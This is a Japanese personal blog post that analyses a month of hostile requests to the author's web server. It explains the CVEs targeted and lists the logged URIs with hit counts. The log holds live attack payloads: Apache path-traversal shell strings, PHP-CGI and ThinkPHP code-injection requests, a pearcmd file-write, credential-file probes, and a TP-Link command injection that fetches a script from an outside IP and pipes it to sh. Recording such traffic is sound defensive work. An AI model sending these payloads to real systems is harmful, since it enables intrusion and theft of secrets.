webサーバのログの分析2024 11月分

2024-12-24 技術系

公開している web サーバのログから通常のアクセスではない通信について分析しました。

多かったリクエスト

PHPUnitのevalをリモート実行

PHPのユニットテストツールのPHPUnitの脆弱性を利用してのeval()を実行しようとする通信

JVNDB-2017-005280 - JVN iPedia - 脆弱性対策情報データベース

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/Util/PHP/eval-stdin.php
/vendor/phpunit/src/Util/PHP/eval-stdin.php                
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php             
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 
/phpunit/phpunit/src/Util/PHP/eval-stdin.php               
/phpunit/phpunit/Util/PHP/eval-stdin.php                   
/phpunit/src/Util/PHP/eval-stdin.php                       
/phpunit/Util/PHP/eval-stdin.php                           
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php           
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php               
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php   
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php    
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php    
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php     
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php  
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php  
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php   
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php    
/lib/phpunit/src/Util/PHP/eval-stdin.php                   
/lib/phpunit/Util/PHP/eval-stdin.php                       
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

ログイン画面へのアクセス

どのサービス化までは特定できませんでしたが、ブルートフォース目的のログイン画面へのアクセスがありました。

/admin/assets/js/views/login.js
/html/admin/assets/js/views/login.js

Apacheのパストラバーサルの脆弱性 (CVE-2021-41773、CVE-2021-42013)を利用したシェルの実行

普通にパストラバーサルを試す攻撃がありました。

Apache HTTP Serverのディレクトリトラバーサル脆弱性_CVE-2021-41773_検証 #Apache_http_server - Qiita

/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh

TP-Link製ルータArcher AX21の脆弱性（CVE-2023-1389）を狙った攻撃

2023年6月度 MBSD-SOCの検知傾向トピックス | 技術者ブログ | 三井物産セキュアディレクション株式会社

/cgi-bin/luci/;stok=/locale

GeoServerの脆弱性

GeoServer の深刻な脆弱性 CVE-2023-35042 が FIX：RCE 攻撃が観測されている – IoT OT Security News

/geoserver/web/

Spring Frameworkの脆弱性

Spring FrameworkのSpring Cloud Gatewayという機能の脆弱性に関する通信みたいです。
CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability

/actuator/gateway/routes

不審な通信の一覧

uri	count
/robots.txt	1679
/.env	882
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	389
/favicon.ico	341
/sw.js	327
/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	303
/admin/assets/js/views/login.js	285
/ads.txt	209
/.git/config	180
/admin/config.php	169
/cgi-bin/luci/;stok=/locale	150
*	143
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=’:\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC0	139
/wp-login.php	131
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh	125
mstshash=Administr	123
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh	110
/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php	103
/vendor/phpunit/Util/PHP/eval-stdin.php	103
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input	103
/vendor/phpunit/src/Util/PHP/eval-stdin.php	102
/vendor/phpunit/phpunit/LICENSE/eval-stdin.php	102
/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	101
/phpunit/phpunit/src/Util/PHP/eval-stdin.php	101
/phpunit/phpunit/Util/PHP/eval-stdin.php	101
/phpunit/src/Util/PHP/eval-stdin.php	100
/phpunit/Util/PHP/eval-stdin.php	100
/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php	99
/lib/phpunit/phpunit/Util/PHP/eval-stdin.php	99
/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/lib/phpunit/src/Util/PHP/eval-stdin.php	98
/lib/phpunit/Util/PHP/eval-stdin.php	98
/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	98
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello	97
/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello	97
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php	97
/index.php?lang=../../../../../../../../tmp/index1	97
/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/containers/json	97
/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	97
/app-ads.txt	81
/vendor/phpunit/phpunit/src/Util/PHP/evil.php	80
/app/vendor/phpunit/phpunit/src/Util/PHP/evil.php	80
/index.xml	78
/login.asp	76
/login.rsp	73
/.well-known/traffic-advice	71
/wp	68
/wordpress	68
/old	68
/new	68
/main	68
/home	68
/bk	68
/bc	68
/backup	68
/wp-content/	66
/boaform/admin/formLogin	66
/sellers.json	65
//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js	63
/.env.bak	61
/webui/	59
/manifest.js	59
/.env.example	58
/geoserver/web/	56
/actuator/gateway/routes	56
/_profiler/phpinfo	51
/config.json	47
/html/admin/assets/js/views/login.js	43
/t4	42
/phpinfo.php	42
/tags/go	41
/api/.env	40
/cgi-bin/index.html	39
/cgi-bin/index.cgi	39
/apply.cgi	39
/tags/python	37
/login	37
/.aws/credentials	36
/index.php	35
/info.php	33
/.env.dev	33
/.env.production	32
/password/reset	30
/.env.save	30
/.env.local	30
/wp-includes/class-index-wordpress.php	27
/pinfo.php	27
/admin/.env	27
/.env.prod	27
/core/.env	25
/aws.yml	25
/archives/2019	25
/app/.env	25
/.aws/credentials/phpinfo	25
/about	24
/owa/	23
/crm/.env	23
/backend/.env	23
/apps/.env	23
/webui	22
/vendor/.env	22
/user	22
/new/.env	22
/library/.env	22
/human.aspx	22
/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage	22
/admin/modules/framework/amp_conf/htdocs/admin/config.php	22
/.env.backup	22
/public/.env	21
/app/config/.env	21
/admin.php	21
/.well-known/security.txt	21
/config/.env	20
/actuator/health	20
/.env_sample	20
/www/.git/config	19
/wp-admin/.env	19
/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application	19
/audio/.env	19
/aab9	19
/HNAP1	19
/.json	19
/.env.live	19
/sdk	18
/php_info.php	18
/old_phpinfo.php	18
/media../.git/config	18
/dev/.git/config	18
/dashboard/phpinfo.php	18
/api/.git/config	18
/1.php	18
//.env	18
/.env.stage	18
/.env.old	18
/static../.git/config	17
/php-info.php	17
/linusadmin-phpinfo.php	17
/dns-query	17
/data/.git/config	17
/base/.env	17
/assets../.git/config	17
/_profiler/phpinfo.php	17
/.gitlab-ci.yml	17
/+CSCOE+/logon.html	17
/v2/_catalog	16
/public/.git/config	16
/media/.git/config	16
/download/.env	16
/docs/.env	16
/config/aws.yml	16
/aaa9	16
/.envrc	16
/web/.env	15
/teorema505?t=1	15
/src/.git/config	15
/site/.env	15
/shared/.env	15
/lib/.env	15
/js/.git/config	15
/docker-compose.prod.yml	15
/default.php	15
/debug/default/view?panel=config	15
/database/.env	15
/config/environment.rb	15
/config.yml	15
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45.202.35.24%2Fl+-O-%7C+sh%60)	15
/alive.php	15
/ab2h	15
/ab2g	15
/aab8	15
/.vscode/sftp.json	15
/.travis.yml	15
/.env.prod.local	15
web.realsysadm.in:443	14
example.com:80	14
/wp-content/.env	14
/version	14
/server/.git/config	14
/laravel/.env	14
/conf/.env	14
/.git/HEAD	14
7	13
/www/.env	13
/src/.env	13
/sites/all/libraries/mailchimp/.env	13
/protected/.env	13
/old/.env	13
/menu.php	13
/local/.env	13
/demo/.env	13
/cgi-bin/.env	13
/bootstrap.yml	13
/blog/.env	13
/autodiscover/autodiscover.json?@zdi/Powershell	13
//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js	13
//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js	13
//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js	13
/.env.production.local	13
/.env.dev.local	13
/xx.php	12
/ws.php	12
/wp-content/themes/seotheme/mar.php	12
/upload.php	12
/upl.php	12
/systembc/password.php	12
/shell.php	12
/password.php	12
/geoip/	12
/form.html	12
/dana-na/nc/nc_gina_ver.txt	12
/dana-cached/hc/HostCheckerInstaller.osx	12
/cgi-bin/info.cgi	12
/base.php	12
/.well-known/assetlinks.json	12
/.well-known/apple-app-site-association	12
/.env~	12
/.env.testing	12

＜映画「THE SIN 罪」の感想

映画「動物界」の感想＞